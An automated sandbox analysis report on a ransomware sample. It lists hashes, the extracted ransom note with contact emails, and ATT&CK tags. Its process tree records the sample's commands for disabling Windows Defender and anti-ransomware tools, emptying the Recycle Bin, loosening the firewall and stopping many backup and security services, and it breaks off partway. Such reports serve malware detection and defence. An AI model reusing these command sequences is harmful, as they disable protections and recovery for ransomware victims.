2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
12s
max time network
155s
platform
windows7_x64
resource
win7v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
Size

481KB
MD5

50379b825ba54e395092a73fb4b6e399
SHA1

8171cf970cbd3746c74143d4933e4f2a69e1ea7e
SHA256

02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f
SHA512

42015ac9b4a3b33adda1d1c538cc33126d72f6f8ccbd4d72b58485971a0b03b9e17908d304f6e9d3a2fe389741995618ce3ce6520bec3e62930fb11b741f090d

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Instruction.txt

Ransom Note

Hello. Your files, documents, photo, databases and all the rest aren't REMOVED. They are ciphered by the most reliable enciphering. It is impossible to restore files without our help. You will try to restore files independent you will lose files FOREVER. ---------------------------------------------------------- You will be able to restore files so: 1. to contact us by e-mail: [email protected] * report your ID and we will switch off any removal of files (if don't report your ID identifier, then each 24 hours will be to be removed on 24 files. If report to ID-we will switch off it) * you send your ID identifier and 2 files, up to 2 MB in size everyone. We decipher them, as proof of a possibility of interpretation. also you receive the instruction where and how many it is necessary to pay. 2. you pay and confirm payment. 3. after payment you receive the DECODER program. which you restore ALL YOUR FILES. ---------------------------------------------------------- You have 72 hours on payment. If you don't manage to pay in 72 hours, then the price of interpretation increases twice. The price increases twice each 72 hours. To restore files, without loss, and on the minimum tariff, you have to pay within 72 hours. Address for detailed instructions e-mail: [email protected] If you don't waste time for attempts to decipher, then you will be able to restore all files in 1 hour. If you try to decipher - you can FOREVER lose your files. e-mail: [email protected] Key Identifier: SLdaGCF4ew8t/9t0D4EHVnZF4HNwA9H0Ll6SD1DvUrhjH3w+qSQ7E7k63GZ7g78iOL7PZ5u3WlLOYFYXzIVDtCRq1aplveI6YC4NPS4vkRhZR9YMlt1hBkjlshxKVW4A1f4mtEv2EVjfZso+cd1hrOhln8MCNnh1iXkvBi+4/8E5Nn3ugCFRb2o6MxsQsUc6hGzSr9te6sJwOV8CEDKcwpyRgW9tzgs0Mrudw0OpgZHrgHohBvBYmP6588VKISli8yDQAt9BtRGcEgMpnULhA8i75UggGUwuYXXp9tCNeaG/AS0Zcctg30e/bh45gI9cuDrEhGAKCt5kGgB+7YZDTkAak8RFRMyZPGtjP2LKowDn76iGpRsiI/g0uIDQauvGV/bdvefJJXpfG4uF47xUXJTqeayShdkthpY13JqX4Tfi4QW2Ybyx7ve7xCLi+L16q1oF4HS02fIb+ArJ5gkh5IkEA6U6xXgfIgubPKjZsNnx+fsV5rB8pzBFNQ4lK3ZiIVZYHym6DaTcYmjcPvjpErOSkgGfG4y/SD3fEnmvKEUoegUyimBZ9aeOTZxsRcgErjXhDOdcIvy9EHKQO2KH4M47/wFpsAjnvuKlq1rbMbY9gJIbN3qY4Z41EpuMmgyr7ZIPkp6LAGdvUU2ZhHeJD6etxW4dv/nxmOsMibxThaQ=

Emails

[email protected]

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

6028 icacls.exe
6048 icacls.exe
6056 icacls.exe

pid	process
6028	icacls.exe
6048	icacls.exe
6056	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

3268 net.exe

pid	process
3268	net.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5852	taskkill.exe
5712	taskkill.exe
5968	taskkill.exe
5656	taskkill.exe
5624	taskkill.exe
5752	taskkill.exe
5936	taskkill.exe
5876	taskkill.exe
5836	taskkill.exe
5812	taskkill.exe
5804	taskkill.exe
5764	taskkill.exe
5688	taskkill.exe
5976	taskkill.exe
5632	taskkill.exe
5704	taskkill.exe
5944	taskkill.exe
5828	taskkill.exe
5796	taskkill.exe
5788	taskkill.exe
5772	taskkill.exe
5696	taskkill.exe
5664	taskkill.exe
5952	taskkill.exe
5640	taskkill.exe
5648	taskkill.exe
5984	taskkill.exe
5844	taskkill.exe
5820	taskkill.exe
5736	taskkill.exe
5992	taskkill.exe
6000	taskkill.exe
5928	taskkill.exe
5900	taskkill.exe
5860	taskkill.exe
5728	taskkill.exe
5680	taskkill.exe
5672	taskkill.exe
5744	taskkill.exe
5916	taskkill.exe
5908	taskkill.exe
5960	taskkill.exe
5892	taskkill.exe
5884	taskkill.exe
5868	taskkill.exe
5780	taskkill.exe
1596	taskkill.exe
5720	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

432 reg.exe
Runs net.exe

pid	process
432	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

pid	process
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

description pid process

Token: SeDebugPrivilege 372 02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

description	pid	process
Token: SeDebugPrivilege	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

description	pid	process	target process
PID 372 wrote to memory of 1684	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	powershell.exe
PID 372 wrote to memory of 1684	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	powershell.exe
PID 372 wrote to memory of 1684	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	powershell.exe
PID 372 wrote to memory of 468	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	net.exe
PID 372 wrote to memory of 468	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	net.exe
PID 372 wrote to memory of 468	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe"
1⤵
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  PID:1684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  PID:468
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:5212
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1836
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1140
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:1840
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:5288
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:5260
- C:\Windows\system32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:2184
- C:\Windows\system32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:2224
- C:\Windows\system32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:2492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:4744
- C:\Windows\system32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:2556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:3048
- C:\Windows\system32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:2524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:2216
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:2616
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:2640
- C:\Windows\system32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:4896
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:2920
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:3000
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:3064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:6212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  PID:2116
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:6180
- C:\Windows\system32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:2684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:7060
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:2904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:4640
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:6808
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:3320
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:6924
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:2872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:2372
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:1112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    3⤵
    PID:6796
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:2024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:7040
- C:\Windows\system32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:2800
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:3808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:4728
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:3800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:7208
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:3788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:2548
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:3780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    3⤵
    PID:2104
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:3772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:6608
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:2372
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:3756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3⤵
    PID:4972
- C:\Windows\system32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:3748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:5288
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:3708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:7220
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:7184
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:3680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:3928
- C:\Windows\system32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:3672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:7952
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:3664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:7832
- C:\Windows\system32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:3656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:7240
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:3648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:7176
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:7200
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:3640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:5204
- C:\Windows\system32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:3616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:2524
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:3552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:7364
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:3544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:6556
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:3528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:7192
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:3520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:7312
- C:\Windows\system32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:3512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:7688
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:3496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:7696
- C:\Windows\system32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:3488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:968
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:3472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:7444
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:2328
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:7396
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:3444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:7824
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:2552
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:4744
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:8060
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:3412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:7680
- C:\Windows\system32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:3404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:8084
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:3088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:8008
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:3380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3272
- C:\Windows\system32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:8028
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:3924
- - C:\Windows\system32\net1.exe
